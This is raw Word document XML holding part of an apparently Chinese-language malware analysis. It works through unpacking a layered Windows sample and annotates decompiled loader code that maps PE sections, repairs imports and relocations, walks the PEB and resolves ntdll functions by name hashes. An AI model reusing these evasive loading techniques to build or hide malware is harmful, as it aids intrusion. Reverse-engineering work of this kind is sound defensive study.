    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    while ( v4 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      v15 = *(_DWORD *)(v7 + 16);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      memcpy((char *)currentbase + *(_DWORD *)(v7 + 12), (const void *)(membase + *(_DWORD *)(v7 + 20)), v24);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      v7 += 40;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      v4 = v6 - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    Free(membase, size);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v32 = (char *)currentbase + *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 40);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v16 = (char *)currentbase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    resetself(</w:t>
      </w:r>
      <w:r w:rsidR="00636738">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00636738">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改入口点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      (int)currentbase,</w:t>
      </w:r>
      <w:r w:rsidR="00B02358">
        <w:t>//0x400000</w:t>
      </w:r>
      <w:r w:rsidR="00922BCA">
        <w:t xml:space="preserve">  Imagebase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      (int)v33,</w:t>
      </w:r>
      <w:r w:rsidR="00B02358">
        <w:t>//0x42E000</w:t>
      </w:r>
      <w:r w:rsidR="00195503">
        <w:t xml:space="preserve">  old entry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      (int)v32,</w:t>
      </w:r>
      <w:r w:rsidR="007B2781">
        <w:t>//0x411390</w:t>
      </w:r>
      <w:r w:rsidR="00195503">
        <w:tab/>
        <w:t>new entry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 80));</w:t>
      </w:r>
      <w:r w:rsidR="00993DAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//sizeofImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    fiximport((int)v16);</w:t>
      </w:r>
      <w:r w:rsidR="00334380">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00334380">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复输入表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v14 = *(_DWORD *)&amp;v16[*((_DWORD *)v16 + 15) + 52];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    fixreloc(v25, v12);</w:t>
      </w:r>
      <w:r w:rsidR="00334380">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00334380">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复重定位表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v13 = *(_WORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 6);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    JUMPOUT(&amp;loc_230C9A);</w:t>
      </w:r>
      <w:r w:rsidR="00842CB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00842CB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置各个新节的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  return result;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003433C" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0003433C" w:rsidRDefault="0003433C" w:rsidP="00DD5E37"/>
    <w:p w:rsidR="002D19D6" w:rsidRPr="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="00C60D9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首先遇到的是</w:t>
      </w:r>
      <w:r w:rsidRPr="002D19D6">
        <w:t>getNtdllBase</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:t>该函数</w:t>
      </w:r>
      <w:r w:rsidR="00C60D97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00C60D97" w:rsidRPr="00C60D97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
      <w:r w:rsidR="00C60D97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将模块名事先计算出一个</w:t>
      </w:r>
      <w:r w:rsidR="00C60D97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C60D97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节值</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>peb</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构，</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遍历</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="00126D5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链表得到指定模块基址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">int __cdecl getNtdllBase(int </w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:t>sig)//</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06" w:rsidRPr="004D5C06">
        <w:t xml:space="preserve"> dllsig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里用作匹配模块名，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ntdll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="002D19D6">
        <w:t xml:space="preserve"> FB145B9Bh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  int result; // eax@0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  int v2; // eax@2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  WCHAR *v3; // ecx@2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  int v4; // eax@7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  _LDR_DATA_TABLE_ENTRY *v5; // edx@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  PLIST_ENTRY v6; // ebx@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6"/>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  v6 = (PLIST_ENTRY)(*(_DWORD *)(__readfsdword(48) + 12) + 12);// _PEB_LDR_DATA-&gt;InLoadOrderModuleList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  v5 = (_LDR_DATA_TABLE_ENTRY *)v6-&gt;Flink-&gt;Flink;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  while ( (PLIST_ENTRY)v5 != v6 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    v3 = v5-&gt;BaseDllName.Buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    v2 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    while ( *v3 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">      v2 = __ROL4__(v2, 7);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">      LOBYTE(v2) = (*(_BYTE *)v3 | 0x20) ^ v2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">      ++v3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    v4 = v2 ^ 0x4B50FA82;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    if ( v4 == funcnamesig )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">      return v5-&gt;DllBase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    v5 = (_LDR_DATA_TABLE_ENTRY *)v5-&gt;InLoadOrderLinks.Flink;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">    result = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t xml:space="preserve">  return result;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRPr="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="002D19D6">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D19D6" w:rsidRDefault="002D19D6" w:rsidP="00DD5E37"/>
    <w:p w:rsidR="009463B3" w:rsidRDefault="00C60D97" w:rsidP="009463B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然后遇到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getFunction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函数通过算法将函数名事先计算出一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节值，</w:t>
      </w:r>
      <w:r>
        <w:t>用作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>匹配</w:t>
      </w:r>
      <w:r>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块导出表从而获取</w:t>
      </w:r>
      <w:r w:rsidR="0077215E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数基址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009463B3" w:rsidRDefault="009463B3" w:rsidP="00DD5E37">
      <w:r>
        <w:t xml:space="preserve">FARPROC __cdecl </w:t>
      </w:r>
      <w:r w:rsidR="00C60D97">
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="009463B3">
        <w:t xml:space="preserve">etFunction(int base, int </w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:t>func</w:t>
      </w:r>
      <w:r w:rsidRPr="009463B3">
        <w:t>sig)</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:t>//base</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为模块基址，</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:t>目前</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ntdll</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06" w:rsidRPr="004D5C06">
        <w:t>funcsig</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用作匹配函数名，</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06" w:rsidRPr="004D5C06">
        <w:t>NtAllocateVirtualMemory</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应</w:t>
      </w:r>
      <w:r w:rsidR="004D5C06" w:rsidRPr="004D5C06">
        <w:t>0x42025366</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t>int __cdecl GetFunction(int ntdllbase, int sig)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  int v2; // ebp@0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  return GetFunctionFromEat(v2);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传给该函数，</w:t>
      </w:r>
      <w:r>
        <w:t>因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在子函数中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ebp+8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为第一个参数，</w:t>
      </w:r>
      <w:r>
        <w:t>以此类推</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06"/>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t>int __usercall GetFunctionFromEat@&lt;eax&gt;(int a1@&lt;ebp&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  DWORD v1; // esi@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  _IMAGE_EXPORT_DIRECTORY *exportbase; // eax@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  int sig; // ebx@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06"/>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  exportbase = (_IMAGE_EXPORT_DIRECTORY *)(*(_DWORD *)(a1 + 8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">                                         + *(_DWORD *)(*(_DWORD *)(*(_DWORD *)(a1 + 8) + 0x3C)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">                                                     + *(_DWORD *)(a1 + 8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">                                                     + 0x78));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  v1 = exportbase-&gt;AddressOfNames;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  *(_DWORD *)(a1 - 4) = exportbase-&gt;NumberOfNames;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  sig = *(_DWORD *)(a1 + 12);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t xml:space="preserve">  JUMPOUT(&amp;loc_230925);</w:t>
      </w:r>
      <w:r w:rsidR="0063275C">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0063275C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里本质是一个循环做匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D5C06" w:rsidRDefault="004D5C06" w:rsidP="004D5C06"/>
    <w:p w:rsidR="005F4BA3" w:rsidRDefault="00975E63" w:rsidP="00975E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这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00975E63">
        <w:t>0xDF62A7E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标志正是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段的起始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F4BA3" w:rsidRDefault="00975E63" w:rsidP="004D5C06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66181EAE" wp14:editId="7D65F928">
            <wp:extent cx="6392174" cy="223892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226" cy="22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1C" w:rsidRDefault="007E2E1C" w:rsidP="004D5C06"/>
    <w:p w:rsidR="007E2E1C" w:rsidRDefault="00A818BD" w:rsidP="004D5C06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>od</w:t>
      </w:r>
      <w:r w:rsidR="007E2E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在新入口</w:t>
      </w:r>
      <w:r w:rsidR="007E2E1C" w:rsidRPr="007E2E1C">
        <w:t>0x411390</w:t>
      </w:r>
      <w:r w:rsidR="007E2E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转储</w:t>
      </w:r>
      <w:r w:rsidR="007E2E1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B77BC7" w:rsidRDefault="00B77BC7" w:rsidP="004D5C06"/>
    <w:p w:rsidR="00B77BC7" w:rsidRDefault="00B77BC7" w:rsidP="004D5C06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6858000" cy="1280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C9" w:rsidRDefault="005A12C9" w:rsidP="004D5C06">
      <w:pPr>
        <w:sectPr w:rsidR="005A12C9" w:rsidSect="005D3942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7E2E1C" w:rsidRDefault="005A12C9" w:rsidP="005A12C9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc467351366"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>解密第三层</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="005A12C9" w:rsidRDefault="00C93EA0" w:rsidP="005A12C9">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上做的所有工作都是为了获取入口点</w:t>
      </w:r>
      <w:r w:rsidR="00895D71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00895D71">
        <w:t>dump</w:t>
      </w:r>
      <w:r w:rsidR="00895D71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出来的文件带</w:t>
      </w:r>
      <w:r w:rsidR="00895D71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mediaplayer</w:t>
      </w:r>
      <w:r w:rsidR="00895D71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图标，</w:t>
      </w:r>
      <w:r w:rsidR="00895D71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>185k</w:t>
      </w:r>
      <w:r w:rsidR="00836EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00836EAC">
        <w:t>入口代码</w:t>
      </w:r>
      <w:r w:rsidR="00836EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836EAC" w:rsidRDefault="00836EAC" w:rsidP="00836EAC">
      <w:r>
